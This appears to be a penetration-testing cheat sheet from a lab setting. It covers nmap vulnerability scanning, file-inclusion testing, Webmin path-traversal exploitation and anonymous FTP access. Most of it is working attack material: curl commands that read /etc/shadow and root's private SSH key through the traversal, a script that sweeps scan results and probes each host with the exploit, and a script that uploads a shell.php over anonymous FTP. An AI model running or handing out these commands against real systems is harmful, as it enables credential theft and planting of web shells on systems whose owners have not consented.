Scan vulnerabilities
- Scan the open ports and public services for known vulnerabilities
- Search the web (including image results) for the service name/version banner to get initial ideas of which software is attackable
- nmap -v --script=vuln victim-ip -T4
- nmap -v --script exploit -Pn x.x.x.1-254 -oG exploit-sweep.txt
- nmap -Pn -n -sV --script vuln victim_ip ===> note the service versions (-sV) and the OS version, too
- nmap -p 139,445 --script=vuln victim_ip
- nmap -v $ip --script smb-os-discovery.nse
- git clone https://github.com/kurobeats/fimap
- ./fimap.py -H -u 'http://x.x.x.71' -d 3 -w /tmp/urllist ===> harvest mode: crawl the target to depth 3 and write candidate URLs to /tmp/urllist
- ./fimap.py -m -l /tmp/urllist ===> mass mode: test every URL in the list for local/remote file inclusion
Attack ref:
- http://scx020c07c.blogspot.com/2012/09/privilege-escalation-pwnos.html
- https://github.com/jas502n/CVE-2019-15107/blob/master/CVE-2019-15107.gif
File disclosure (Webmin on port 10000, unauthenticated ..%01 directory traversal)
- 5 traversal segments (..%01 repeated 5 times):
  curl http://victim_ip:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/etc/passwd
- 40 traversal segments (..%01 repeated 40 times):
  curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd
- curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow
- curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/root/.ssh/id_rsa.pub
- curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/root/.ssh/id_rsa
- nmap -Pn -n -sV -p80 --script http-rfi-spider.nse victim_ip ===> crawl the web app for remote-file-inclusion candidates
Ref:
- https://www.exploit-db.com/exploits/2017
- perl webmin.pl victim_ip 10000 /etc/passwd 0
- nmap -p 10000 10.11.1.1-254 -oG webmin-sweep.txt
- grep open webmin-sweep.txt | cut -d" " -f2
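The sweep-then-probe loop above (nmap -oG sweep, grep the open hosts, hit each with the ..%01 traversal) as one script. This is an added example, not part of the original notes or the exploit-db script: it assumes grepable (-oG) nmap output, builds the traversal URL with a single slash before "unauthenticated" (the 40-segment commands above use a double slash, which the server treats the same), defaults to /etc/passwd, and treats a line starting with "root:" as proof the file leaked. The sample sweep file at the bottom is constructed, not a real scan.

```shell
#!/bin/sh
# Added example (not from the original notes): sweep a port-10000 scan for
# open hosts and probe each with the Webmin ..%01 traversal.
# Assumptions: nmap -oG output, target file defaults to /etc/passwd,
# and a leading "root:" line is the heuristic for a leaked passwd file.

# Extract the IPs that have 10000/open in a grepable nmap file.
# "/open/" is stricter than a bare "open", so header lines never match.
open_hosts() {
  grep '/open/' "$1" | cut -d" " -f2
}

# Build the unauthenticated traversal URL with "..%01/" repeated $2 times.
# 5 and 40 are the depths used in the curl commands above.
webmin_traversal_url() {
  host="$1"; depth="$2"; file="${3:-/etc/passwd}"
  path=""
  i=0
  while [ "$i" -lt "$depth" ]; do
    path="${path}..%01/"
    i=$((i + 1))
  done
  printf 'http://%s:10000/unauthenticated/%s%s\n' "$host" "$path" "${file#/}"
}

# Heuristic: a real /etc/passwd has a line that starts with "root:".
looks_like_passwd() {
  grep -q '^root:'
}

# Probe one host at both depths; print the first URL that leaks the file.
# This makes network calls, so it is only defined here, not run at load time.
webmin_probe() {
  host="$1"
  for depth in 5 40; do
    url=$(webmin_traversal_url "$host" "$depth" /etc/passwd)
    if curl -s -m 10 "$url" | looks_like_passwd; then
      printf '%s VULNERABLE %s\n' "$host" "$url"
      return 0
    fi
  done
  printf '%s not vulnerable\n' "$host"
  return 1
}

# Offline demo on a constructed grepable file (sample data, not a real scan).
SWEEP=$(mktemp)
printf '# Nmap scan initiated (constructed sample)\n' > "$SWEEP"
printf 'Host: 10.11.1.5 ()\tStatus: Up\n' >> "$SWEEP"
printf 'Host: 10.11.1.5 ()\tPorts: 10000/open/tcp//snet-sensor-mgmt///\n' >> "$SWEEP"
printf 'Host: 10.11.1.9 ()\tPorts: 10000/closed/tcp//snet-sensor-mgmt///\n' >> "$SWEEP"
open_hosts "$SWEEP"     # prints 10.11.1.5 only
rm -f "$SWEEP"

# Real run against the sweep from the notes:
#   for h in $(open_hosts webmin-sweep.txt); do webmin_probe "$h"; done
```

Trying both depths matters because the number of ..%01 segments that works depends on how deep the Webmin install directory sits; the page's own commands use 5 and 40 for that reason.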
FTP NSE scripts (nmap -p 21 --script=<script> $ip):
- ftp-proftpd-backdoor.nse
- ftp-vsftpd-backdoor.nse
- ftp-vuln-cve2010-4221.nse
- nmap -v -p 21 --script=ftp-anon.nse 10.11.1.1-254 -oG anon-ftp-sweep.txt
- grep open anon-ftp-sweep.txt | cut -d" " -f2
- ftp $ip ==> Username: anonymous ==> Password: blank
- FTP command line: https://tecadmin.net/download-upload-files-using-ftp-command-line/ and https://www.cs.colostate.edu/helpdocs/ftp.html
- ftp -p $ip ===> passive mode
- ftp> ls
- ftp> cd uploads
- ftp> binary ===> MUST switch to binary mode before uploading a shell
- ftp> put index.html
- ftp> delete index.html
- ftp> get index.html
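The anonymous-login, cd, binary, put sequence above as a non-interactive ftp(1) batch, so the binary-mode step cannot be forgotten. Added example, not from the original notes: it assumes anonymous login is allowed, that the writable directory is "uploads" (as in the session above), and that the payload is a local file named shell.php (hypothetical). The notes say a blank password is accepted; the batch sends "anonymous@" so the server never waits on a prompt.

```shell
#!/bin/sh
# Added example (not from the original notes): scripted anonymous FTP upload.
# Assumptions: anonymous login works, "uploads" is writable, and the local
# payload is ./shell.php (hypothetical file name).

# Emit the command batch for ftp(1). Order matters: "binary" must come
# before "put", or ASCII mode mangles a non-text payload.
ftp_upload_batch() {
  dir="$1"; localfile="$2"; remotename="${3:-$(basename "$localfile")}"
  printf 'user anonymous anonymous@\n'   # notes say a blank password works too
  printf 'passive\n'                     # same as "ftp -p"
  printf 'binary\n'
  printf 'cd %s\n' "$dir"
  printf 'put %s %s\n' "$localfile" "$remotename"
  printf 'ls\n'                          # confirm the upload landed
  printf 'quit\n'
}

# Sanity check a batch read from stdin: "binary" must precede "put".
batch_is_safe() {
  awk '/^binary$/ {b=NR} /^put / {p=NR} END {exit !(b && p && b < p)}'
}

# Run the batch against a host (network call; only defined here).
# -i: no per-file prompts, -n: no auto-login (we send "user" ourselves), -v: verbose
ftp_upload() {
  host="$1"; dir="$2"; localfile="$3"; remotename="$4"
  ftp_upload_batch "$dir" "$localfile" "$remotename" | ftp -inv "$host"
}

# Offline demo: print the batch and verify its ordering.
ftp_upload_batch uploads ./shell.php
ftp_upload_batch uploads ./shell.php | batch_is_safe && echo "batch OK: binary precedes put"

# Real run:  ftp_upload victim_ip uploads ./shell.php shell.php
```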
- nc victim_ip 25 ===> SMTP banner grab